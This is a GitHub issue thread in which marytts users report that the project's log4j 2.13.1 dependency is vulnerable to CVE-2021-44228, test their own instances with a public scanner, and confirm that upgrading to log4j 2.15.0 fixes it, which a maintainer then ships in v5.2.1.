marytts
marytts copied to clipboard
marytts
Current Release (v5.2) uses log4j version <= 2.14.1 making it possibly vulnerable to a remote code execution exploit
in https://github.com/marytts/marytts/blob/master/dependencies.gradle the listed version of the log4j library is 2.13.1 which is vulnerable to the exploit CVE-2021-44228 (https://nvd.nist.gov/vuln/detail/CVE-2021-44228). This exploit makes remote code execution very simple (Here is a video showing how easily the exploit can be used: https://www.youtube.com/watch?v=7qoPDq41xhQ).
I don't know in what way log4j is currently used in marytts but if it is part of the server/synthesizing process this is a safety issue that has to be attended to.
The exploit has been fixed in version 2.15.0 of log4j (I ran a quick build test with the log4j version set to 2.15.0 and didn't encounter any compatibility issues, but I haven't tested that very thoroughly).
It is indeed used in the server process. I looked at the code though and I found that the logger mostly loggs because of
a call of the form logger.info("xyz:" + message) which is (luckily) NOT a call to logger.info("xyz {}",message) which would be vulnerabel through the message argument.
There is one or two statements that use an format argument, but those seem, after some consideration, not to be injectable from the server side (I may be wrong tho but i did not manage to inject any of those since they are mostly responsible for logging single nonpronouncable chars which is not enough to inject a whole string)
Nonetheless log4j should be upgraded as fast as possible to be on the safe side.
If you already got marytts working with log4j 2.15.0 maybe you could make a fork and open a pull request or link your fork here.
Thank you for bringing attention to this issue !
https://github.com/fullhunt/log4j-scan
does also not find any attack vecotor on my instance, which is no verfication but a good sign.
I fiddled around with this testing website here: https://log4shell.huntress.com/. It gives you a string that can be used as input for the application you want to test and if the exploit works it shows the IP of the vulnerable system and a timestamp of the test. I ran two series of tests (one with the old and one with the new version):
- using log4j-core 2.13.1(version used in current master) used build commands: "./gradlew clean" followed by "./gradlew build" 1.1 using run command "./gradlew run": no vulnerability detected 1.2 using run command "./gradlew run -Dlog4j.logger.marytts='INFO'": vulnerability detected(testing website showed that the teststring had been used by the machine the server was running on) 1.3 using run command "./gradlew run -Dlog4j.logger.marytts='DEBUG'": vulnerability detected 1.4 using run command ".gradlew run -info": vulnerability detected 1.5 using run command ".gradlew run -debug": vulnerability detected
- using log4j-core 2.15.0(simply changed the version in the "dependencies.gradle"-file and cleaned+rebuild) used build commands: "./gradlew clean" followed by "./gradlew build" 2.1 using run command "./gradlew run": no vulnerability detected 2.2 using run command "./gradlew run -Dlog4j.logger.marytts='INFO'": no vulnerability detected 2.3 using run command "./gradlew run -Dlog4j.logger.marytts='DEBUG'": no vulnerability detected 2.4 using run command ".gradlew run -info": no vulnerability detected 2.5 using run command ".gradlew run -debug": no vulnerability detected So as it seems the new version fixes the exploit. I haven't forked the project yet but only downloaded the master branch as zip to play around with it for a bit.
Thanks for your patience here!
I finally got around to addressing this as part of the v5.2.1 maintenance release (see the POM).
Will fix it in the master branch soon.
